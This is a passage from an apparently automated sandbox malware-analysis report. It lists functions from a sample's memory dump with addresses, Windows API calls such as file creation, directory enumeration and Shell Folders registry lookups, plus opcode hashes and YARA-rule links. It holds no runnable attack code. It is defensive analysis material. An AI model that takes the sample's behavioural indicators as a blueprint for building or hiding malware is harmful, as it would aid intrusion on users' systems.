                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413D29, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004096C3, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004096DC, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AA04, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                • Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B04B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004135E0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AEBE, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00414592, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409B98, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415304, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: d7a30217b87844396beaff00f30ed268f23d9c012d56a6eaf751d0a315ea4889
                                                                                • Instruction ID: a168b91d6c68a38202ce30968f6e92704f38d372908953eecb71c31439952969
                                                                                • Opcode Fuzzy Hash: d7a30217b87844396beaff00f30ed268f23d9c012d56a6eaf751d0a315ea4889
                                                                                • Instruction Fuzzy Hash: BDA011A200820023C800A2388A02A0A32880EE023AB200B0AB032820C2CA28C820A82E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415308, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 4f2acecea105929dd68a98652c955513c3e3c508b25600984837618851198afc
                                                                                • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                • Opcode Fuzzy Hash: 4f2acecea105929dd68a98652c955513c3e3c508b25600984837618851198afc
                                                                                • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041BE52, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00445403, Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                • Opcode ID: 6ca507b1182f541838446e00a74c349a867c8540941c4eaacfd5de9a02b97d56
                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                • Opcode Fuzzy Hash: 6ca507b1182f541838446e00a74c349a867c8540941c4eaacfd5de9a02b97d56
                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AFCF, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID:
                                                                                • API String ID: 1936579350-0
                                                                                • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions